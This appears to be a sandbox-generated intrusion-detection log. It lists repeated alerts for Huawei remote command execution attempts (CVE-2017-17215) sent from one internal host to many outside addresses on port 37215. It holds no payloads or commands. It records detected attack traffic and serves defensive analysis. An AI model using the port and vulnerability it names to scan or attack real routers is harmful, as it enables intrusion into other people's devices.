                                            06/14/24-10:44:22.861287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5606837215192.168.2.1441.167.12.141
                                            06/14/24-10:44:08.502904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624437215192.168.2.1441.22.37.93
                                            06/14/24-10:43:52.146127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579837215192.168.2.14197.184.32.94
                                            06/14/24-10:43:54.184045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345437215192.168.2.1441.185.94.228
                                            06/14/24-10:43:58.293237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606437215192.168.2.14156.67.221.84
                                            06/14/24-10:43:43.943873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197837215192.168.2.14156.60.78.102
                                            06/14/24-10:43:41.897214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068637215192.168.2.14156.2.150.245
                                            06/14/24-10:44:04.405883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471837215192.168.2.14197.224.119.217
                                            06/14/24-10:44:02.384174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346637215192.168.2.14156.58.139.222
                                            06/14/24-10:44:04.420333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031837215192.168.2.14197.185.205.205
                                            06/14/24-10:43:54.186468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445037215192.168.2.1441.140.211.132
                                            06/14/24-10:44:31.084207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981437215192.168.2.14156.131.92.6
                                            06/14/24-10:43:58.295236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697837215192.168.2.14156.17.181.179
                                            06/14/24-10:44:08.516921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482037215192.168.2.14197.149.193.110
                                            06/14/24-10:43:37.761094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725237215192.168.2.14156.105.127.137
                                            06/14/24-10:43:41.906359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001637215192.168.2.14197.34.148.6
                                            06/14/24-10:43:56.243940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947037215192.168.2.1441.139.239.235
                                            06/14/24-10:44:10.565757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.1441.116.127.181
                                            06/14/24-10:44:12.614118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735237215192.168.2.1441.16.23.236
                                            06/14/24-10:44:18.777898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727837215192.168.2.14197.33.48.92
                                            06/14/24-10:44:29.015058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3365837215192.168.2.14197.245.191.124
                                            06/14/24-10:43:48.045796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584037215192.168.2.1441.92.59.68
                                            06/14/24-10:43:52.143016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689437215192.168.2.14197.129.226.27
                                            06/14/24-10:44:16.716729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649437215192.168.2.14197.72.146.16
                                            06/14/24-10:44:14.668299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3279437215192.168.2.1441.71.244.138
                                            06/14/24-10:44:10.569405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904037215192.168.2.14197.208.185.167
                                            06/14/24-10:43:56.230012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519637215192.168.2.1441.91.107.140
                                            06/14/24-10:43:43.971262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122237215192.168.2.14156.216.29.243
                                            06/14/24-10:43:58.276940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938437215192.168.2.1441.189.123.129
                                            06/14/24-10:44:31.092225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762837215192.168.2.1441.69.173.235
                                            06/14/24-10:43:43.940585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039837215192.168.2.14156.98.108.128
                                            06/14/24-10:43:41.849802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189037215192.168.2.1441.251.54.239
                                            06/14/24-10:44:18.763662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686237215192.168.2.14156.2.116.187
                                            06/14/24-10:43:48.029274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240037215192.168.2.1441.84.156.114
                                            06/14/24-10:44:16.737239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363837215192.168.2.14156.28.144.152
                                            06/14/24-10:44:18.775883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728637215192.168.2.14156.79.255.39
                                            06/14/24-10:44:35.182577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150637215192.168.2.14197.55.26.147
                                            06/14/24-10:43:45.968115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938637215192.168.2.14156.160.68.141
                                            06/14/24-10:44:02.383429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835837215192.168.2.14197.103.134.243
                                            06/14/24-10:44:12.616533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879437215192.168.2.1441.167.240.250
                                            06/14/24-10:44:06.453201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624437215192.168.2.1441.252.146.47
                                            06/14/24-10:43:39.808044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972437215192.168.2.1441.164.127.86
                                            06/14/24-10:44:20.804334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.1441.44.44.96
                                            06/14/24-10:44:20.806088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626637215192.168.2.14156.221.232.144
                                            06/14/24-10:43:56.242349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824437215192.168.2.1441.180.178.147
                                            06/14/24-10:44:35.178672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891637215192.168.2.1441.195.61.189
                                            06/14/24-10:43:36.718489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342437215192.168.2.1441.57.133.165
                                            06/14/24-10:44:29.013557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149037215192.168.2.14156.180.127.241
                                            06/14/24-10:44:29.023054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536037215192.168.2.1441.220.189.104
                                            06/14/24-10:43:34.662651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651037215192.168.2.14197.208.58.206
                                            06/14/24-10:44:06.452462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445437215192.168.2.14197.69.53.85
                                            06/14/24-10:43:41.905822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594237215192.168.2.14197.244.203.169
                                            06/14/24-10:43:50.071921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763237215192.168.2.14156.145.246.150
                                            06/14/24-10:44:00.343883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745037215192.168.2.14156.218.178.154
                                            06/14/24-10:44:20.805119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181237215192.168.2.1441.13.100.164
                                            06/14/24-10:43:56.243219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355637215192.168.2.14197.254.228.251
                                            06/14/24-10:43:52.163978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926437215192.168.2.14156.184.166.74
                                            06/14/24-10:44:00.340678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436637215192.168.2.14156.105.73.27
                                            06/14/24-10:44:18.775831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824037215192.168.2.1441.82.14.190
                                            06/14/24-10:43:56.253931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096637215192.168.2.14197.5.68.23
                                            06/14/24-10:44:10.567661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471637215192.168.2.14197.139.80.231
                                            06/14/24-10:44:22.859762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370637215192.168.2.14197.24.21.83
                                            06/14/24-10:44:35.181249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626037215192.168.2.14156.53.240.193
                                            06/14/24-10:43:36.700306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926037215192.168.2.1441.43.246.92
                                            06/14/24-10:44:02.366480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922037215192.168.2.14156.223.65.183
                                            06/14/24-10:44:20.828205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027037215192.168.2.1441.63.245.226
                                            06/14/24-10:43:48.028933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912437215192.168.2.14197.184.139.121
                                            06/14/24-10:44:10.549232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485437215192.168.2.14197.209.104.18
                                            06/14/24-10:44:08.503637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865037215192.168.2.14156.245.107.179
                                            06/14/24-10:44:08.519796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422237215192.168.2.1441.47.98.73
                                            06/14/24-10:44:14.668926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672037215192.168.2.14156.128.107.113
                                            06/14/24-10:43:50.112020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916837215192.168.2.1441.55.183.87
                                            06/14/24-10:43:45.969454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859437215192.168.2.1441.28.101.96
                                            06/14/24-10:44:08.517850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243437215192.168.2.14197.100.4.181
                                            06/14/24-10:44:02.369355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804237215192.168.2.1441.187.237.237
                                            06/14/24-10:43:48.017009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060037215192.168.2.14156.114.121.196
                                            06/14/24-10:44:20.804639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730637215192.168.2.1441.50.164.216
                                            06/14/24-10:43:48.029492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112237215192.168.2.14197.240.49.250
                                            06/14/24-10:44:12.646868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450837215192.168.2.14156.214.227.67
                                            06/14/24-10:43:56.242032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032437215192.168.2.1441.236.117.155
                                            06/14/24-10:43:41.847609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610237215192.168.2.14156.195.146.2
                                            06/14/24-10:44:08.504245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729637215192.168.2.14156.62.77.61
                                            06/14/24-10:43:52.163666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503037215192.168.2.1441.197.136.117
                                            06/14/24-10:43:43.944645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550237215192.168.2.14156.153.219.202
                                            06/14/24-10:43:48.021552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5881437215192.168.2.1441.111.215.236
                                            06/14/24-10:43:43.942742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371437215192.168.2.14156.208.175.175
                                            06/14/24-10:43:41.898324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419837215192.168.2.1441.236.231.183
                                            06/14/24-10:44:02.365354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019637215192.168.2.14197.93.101.3
                                            06/14/24-10:43:41.846796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726237215192.168.2.1441.191.23.253
                                            06/14/24-10:44:31.052671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044637215192.168.2.14197.175.223.234
                                            06/14/24-10:43:50.074096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329437215192.168.2.14156.211.104.77
                                            06/14/24-10:44:33.131289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779437215192.168.2.1441.251.141.113
                                            06/14/24-10:44:29.024437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048637215192.168.2.1441.3.198.134
                                            06/14/24-10:44:04.407245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673637215192.168.2.14197.163.57.236
                                            06/14/24-10:44:16.715160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539637215192.168.2.1441.175.6.114
                                            06/14/24-10:44:04.411996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346837215192.168.2.14197.47.53.10
                                            06/14/24-10:44:08.517822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425437215192.168.2.14156.179.164.182
                                            06/14/24-10:43:45.966639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086637215192.168.2.14197.199.246.198
                                            06/14/24-10:43:39.792277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536837215192.168.2.14156.100.46.16
                                            06/14/24-10:43:36.700909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632837215192.168.2.14156.194.247.78
                                            06/14/24-10:43:36.703350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012637215192.168.2.14156.178.144.38
                                            06/14/24-10:43:48.032361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318637215192.168.2.14197.160.233.109
                                            06/14/24-10:44:00.324376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453437215192.168.2.14156.244.122.76
                                            06/14/24-10:43:41.846376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017237215192.168.2.14197.115.206.145
                                            06/14/24-10:43:48.032989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681237215192.168.2.14197.123.149.120
                                            06/14/24-10:44:33.134766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121437215192.168.2.1441.236.247.237
                                            06/14/24-10:44:12.613791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837637215192.168.2.14156.82.103.243
                                            06/14/24-10:44:26.997493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630437215192.168.2.14156.243.85.121
                                            06/14/24-10:44:08.517797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056237215192.168.2.14156.149.80.39
                                            06/14/24-10:44:00.338345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856637215192.168.2.14197.159.135.106
                                            06/14/24-10:44:00.324203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673437215192.168.2.14197.148.241.231
                                            06/14/24-10:43:39.790923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4603837215192.168.2.14156.93.123.151
                                            06/14/24-10:44:10.569487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829237215192.168.2.1441.4.79.11
                                            06/14/24-10:44:24.935478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353637215192.168.2.14156.0.239.167
                                            06/14/24-10:44:02.381307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752837215192.168.2.1441.130.147.86
                                            06/14/24-10:44:20.828232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226437215192.168.2.1441.248.111.67
                                            06/14/24-10:43:39.792440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959837215192.168.2.14197.41.131.92
                                            06/14/24-10:44:00.337246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359837215192.168.2.14197.146.97.147
                                            06/14/24-10:44:33.132836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855637215192.168.2.14197.79.190.194
                                            06/14/24-10:44:06.449093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925037215192.168.2.1441.248.100.105
                                            06/14/24-10:43:58.293638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518837215192.168.2.1441.7.218.247
                                            06/14/24-10:44:06.470907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130037215192.168.2.14156.199.45.159
                                            06/14/24-10:43:39.789234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437637215192.168.2.1441.221.237.136
                                            06/14/24-10:43:43.967438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177237215192.168.2.14197.24.29.80
                                            06/14/24-10:44:33.148476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764237215192.168.2.1441.82.148.229
                                            06/14/24-10:44:35.178948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710637215192.168.2.14197.181.74.123
                                            06/14/24-10:44:24.941783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768637215192.168.2.1441.242.214.165
                                            06/14/24-10:43:58.295432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881237215192.168.2.14156.112.4.102
                                            06/14/24-10:43:34.676584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994037215192.168.2.14197.224.71.250
                                            06/14/24-10:44:29.028042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635637215192.168.2.14156.252.132.192
                                            06/14/24-10:44:16.718289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951237215192.168.2.14197.149.93.25
                                            06/14/24-10:43:41.902485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369237215192.168.2.1441.27.192.97
                                            06/14/24-10:44:22.861191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239237215192.168.2.14197.236.137.143
                                            06/14/24-10:43:36.704326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5179237215192.168.2.1441.144.155.123
                                            06/14/24-10:44:31.082575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117037215192.168.2.14197.185.44.146
                                            06/14/24-10:44:04.411917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638437215192.168.2.14197.183.212.159
                                            06/14/24-10:43:41.897944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026237215192.168.2.14197.143.25.209
                                            06/14/24-10:44:00.338679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452637215192.168.2.14156.102.220.115
                                            06/14/24-10:44:08.502056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605437215192.168.2.14197.61.107.34
                                            06/14/24-10:43:52.150785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573837215192.168.2.1441.196.152.105
                                            06/14/24-10:44:20.804505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372637215192.168.2.14156.160.177.57
                                            06/14/24-10:43:34.677803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313037215192.168.2.1441.231.252.57
                                            06/14/24-10:43:34.679469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223437215192.168.2.1441.180.19.47
                                            06/14/24-10:43:39.807694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597237215192.168.2.14197.150.130.171
                                            06/14/24-10:44:14.683898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623437215192.168.2.1441.13.224.61
                                            06/14/24-10:43:48.030408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941437215192.168.2.14197.132.142.238
                                            06/14/24-10:43:52.164316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904037215192.168.2.14156.47.14.64
                                            06/14/24-10:43:34.660518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824237215192.168.2.1441.211.225.173
                                            06/14/24-10:43:54.183786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965837215192.168.2.14197.83.238.111
                                            06/14/24-10:44:29.025336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024237215192.168.2.14156.58.110.209
                                            06/14/24-10:44:22.862218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3986837215192.168.2.14197.253.150.43
                                            06/14/24-10:43:50.072337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521037215192.168.2.1441.3.93.224
                                            06/14/24-10:44:24.942044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378237215192.168.2.14156.35.21.226
                                            06/14/24-10:44:08.520668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517037215192.168.2.14197.141.222.101
                                            06/14/24-10:44:16.717054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965837215192.168.2.14156.237.18.96
                                            06/14/24-10:43:54.198276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997237215192.168.2.1441.22.57.228
                                            06/14/24-10:44:10.569229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631437215192.168.2.14156.62.247.61
                                            06/14/24-10:43:56.226702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514237215192.168.2.14156.38.253.118
                                            06/14/24-10:43:39.790702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476637215192.168.2.14156.121.18.120
                                            06/14/24-10:43:48.017807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641237215192.168.2.14197.191.199.236
                                            06/14/24-10:44:14.689241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536437215192.168.2.14156.215.58.67
                                            06/14/24-10:44:00.324119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148037215192.168.2.14156.148.41.247
                                            06/14/24-10:44:04.408825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256437215192.168.2.14197.180.159.91
                                            06/14/24-10:44:31.087948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992437215192.168.2.14197.18.219.94
                                            06/14/24-10:43:34.676941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257037215192.168.2.14197.247.234.164
                                            06/14/24-10:43:52.164789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607637215192.168.2.1441.28.169.151
                                            06/14/24-10:44:12.645354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064637215192.168.2.14197.202.91.54
                                            06/14/24-10:43:54.183323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5881437215192.168.2.14197.217.229.250
                                            06/14/24-10:44:08.518773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382437215192.168.2.14156.111.74.131
                                            06/14/24-10:44:08.520212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092637215192.168.2.1441.241.228.211
                                            06/14/24-10:43:58.291828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062037215192.168.2.14197.119.47.36
                                            06/14/24-10:44:00.344137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180237215192.168.2.14156.207.102.253
                                            06/14/24-10:43:58.289753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805237215192.168.2.14156.127.125.133
                                            06/14/24-10:44:14.666175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493837215192.168.2.1441.231.173.207
                                            06/14/24-10:44:10.545754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232237215192.168.2.14156.12.253.57
                                            06/14/24-10:44:10.546442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660037215192.168.2.1441.236.81.104
                                            06/14/24-10:44:29.028013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414237215192.168.2.1441.63.132.110
                                            06/14/24-10:43:39.807926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507837215192.168.2.14197.240.119.112
                                            06/14/24-10:43:56.230740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553237215192.168.2.14197.198.42.214
                                            06/14/24-10:44:16.734938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342237215192.168.2.14197.89.136.179
                                            06/14/24-10:44:12.644237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497037215192.168.2.1441.61.69.227
                                            06/14/24-10:44:08.502206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652637215192.168.2.14197.46.115.222
                                            06/14/24-10:44:18.778331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084837215192.168.2.14197.222.158.52
                                            06/14/24-10:44:22.857641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975437215192.168.2.1441.220.123.118
                                            06/14/24-10:44:26.980345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174837215192.168.2.14197.176.198.122
                                            06/14/24-10:44:00.340643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882437215192.168.2.1441.176.24.106
                                            06/14/24-10:43:56.244007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692637215192.168.2.1441.184.147.252
                                            06/14/24-10:44:02.367058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241237215192.168.2.14156.94.50.177
                                            06/14/24-10:43:34.663855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668837215192.168.2.14156.146.20.194
